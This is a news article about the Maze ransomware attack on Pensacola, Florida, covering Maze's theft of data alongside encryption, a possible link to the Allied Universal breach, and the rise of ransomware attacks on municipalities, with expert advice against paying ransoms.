Maze Ransomware Behind Pensacola Attack, Data Breach Looms

Maze exfiltrates data as well as locks down systems. Officials said they don’t know yet whether any residents’ personal information has been breached. 
The Maze ransomware is likely the culprit behind the recently reported cyberattack on Pensacola, Fla., which occurred earlier this week and downed systems citywide.
In an email sent to county commissioners, IT administrators said the Florida Department of Law Enforcement had confirmed that the Pensacola attack was indeed ransomware. Maze operators quickly took responsibility for the incident, saying that they are demanding $1 million in ransom.
As of Wednesday, Pensacola’s systems were slowly coming back online, as IT staff cleared the network of malware, officials told the Pensacola News Journal (online payments for Pensacola Energy and city sanitation customers remained down). It’s unclear whether the city is paying the ransom, but officials did say they don’t know yet whether any residents’ personal information has been breached.
The data breach fears are particularly relevant given that Maze has a quirk not found in most ransomware: In addition to encrypting files and offering the decryption key in exchange for a ransom payment, it also automatically copies all affected files to the malicious operators’ servers, according to researchers.
“For Maze’s victims, the fact that the attackers have exfiltrated the data means the incident is a data breach as well as a malware infection,” explained Duo Security, in a posting on the Florida incident on Wednesday. “This changes the incident response playbook, as the IT department will have to loop in legal and other departments to consider what additional steps will be necessary to recover from the infection.”
For instance, some organizations and municipalities have refused to pay ransoms, in an effort to cut off the cybercriminals’ revenue streams and avoid becoming repeat victims. The decision to pay or not to pay typically comes down to whether it’s possible to restore the data from backups, and weighing cost factors, such as the cost of downtime and cleanup efforts.
“With Maze, there is the prospect of potentially sensitive information being exposed—such as personally identifiable information, customer lists and intellectual property—if the ransom isn’t paid. Even if the organization can afford to rebuild and restore on its own, they may feel the pressure to pay just to keep the files out of public domain,” according to Duo Security researchers.
Maze ransomware, a variant of ChaCha ransomware, was initially found by Malwarebytes security researcher Jérôme Segura in May. He observed the previously unknown ransomware being distributed using the Fallout exploit kit, via a fake site camouflaged as a legitimate cryptocurrency exchange app. Since then, it has cropped up in a number of attacks, including one on security company Allied Universal last month.
According to reports, the crooks in that attack asked for a $2.3 million ransom in exchange for the decryption key and a promise not to release the company’s data. When Allied Universal missed the deadline to pay up, the Maze group published 700 MB worth of data (only 10 percent of what the crooks claimed to have stolen).
Also in November, a new threat actor was seen impersonating the U.S. Postal Service (USPS) and other government agencies to deliver and install both Maze and backdoor malware to various organizations in Germany, Italy and the United States, according to Proofpoint.
Duo Security noted that it’s a “worrying possibility” that the Pensacola attack is linked to the Allied Universal debacle.
“Allied Universal has offices in Pensacola, and if there was any city-related information in its files, the group behind the infection could have potentially used that information against the city [in a phishing campaign],” according to Duo Security. “Another possibility is that if Allied provided security services to the city, the infection could have piggybacked on an Allied employee to move from one network to another. This turns the ransomware attack into a data breach using a third-party supplier.”
This brings up the possibility that attackers are crafting secondary campaigns using information stolen from the first one – potentially setting up a scenario of continuously cascading follow-on attacks.
“The evolution of ransomware infections being a precursor to attacks on other organizations is a highly concerning one,” Duo Security noted. “[This] highlights how a security incident at one organization puts others at risk.”
For its part, in an interview with Bleeping Computer, the Maze group taking responsibility for Pensacola said that it doesn’t use the data for any purpose other than extortion. “We are neither espionage group nor any other type of APT,” the criminal group told the publication. The group also said that it’s not interested in “socially vital objects” such as 911 and medical care centers, and that it attempts to avoid encrypting essential public-safety services.
According to Kaspersky security experts, 2019 has seen a significant spike of ransomware attacks on municipalities. In a report this week, the firm said that municipal ransomware is “the story of the year,” with at least 174 municipal institutions and more than 3,000 subset divisions having been targeted in 2019. This represents a 60 percent increase from last year.
In analyzing publicly available information, Kaspersky also found that ransom demands have varied greatly, with highs reaching up to $5.3 million and an average of $1 million.
The firm noted that while these targets might be less capable of paying a large ransom, they are more likely to agree to cybercriminals’ demands, because blocking any municipal service directly affects the welfare of citizens, causing financial losses as well as other significant and sensitive consequences.
“One must always keep in mind that paying extortionists is a short-term solution which only encourages criminals and keeps them funded to quite possibly repeat the same acts,” said Fedor Sinitsyn, a security researcher at Kaspersky, in a statement. “In addition, once a city has been attacked, the whole infrastructure is compromised and requires an incident investigation and a thorough audit.”
While Maze appears to be an up-and-coming threat, the ransomware families Ryuk, Purga and Stop topped Kaspersky’s list of municipal malware. All of them have unique attack characteristics that cities should be aware of, experts report.
“Ryuk…[has a] distribution model [that] usually involves delivery via backdoor malware which spreads by the means of phishing with a malicious attachment disguised as a financial document,” according to the report. “Purga malware has been recognized since 2016, yet only recently municipalities have been discovered to fall victims to this trojan, having various attack vectors from phishing to brute-force attacks. Stop…propagates by hiding inside software installers.”
Ryuk is particularly notorious. It’s a ransomware strain distributed by the Russian-speaking Wizard Spider financial crime syndicate, first spotted in August 2018. Since then, it has been involved in several high-profile attacks, such as a coordinated, targeted ransomware cyberattack on 23 Texas local and state entities in August.
Despite the fact that the decision to pay the ransom has several dimensions that will be unique to each victim (including, now, the threat of a data breach), some researchers urge those affected to regard paying as a public disservice.
“As long as we as a society continue paying ransoms, these attacks will continue,” said Cody Brocious, hacker and head of Hacker Education at HackerOne, via email. “Maintain regular (offline!) backups, keep your systems up to date, and don’t pay ransoms, if you do happen to get hit. At this point, it’s akin to choosing not to get a flu shot; sure, if you’re healthy then you’re not likely to die from the flu, but you may transmit it to someone who will. Giving in to these criminals is acting against the public good, which just ends up protecting organizations from the consequences of not taking their data seriously.”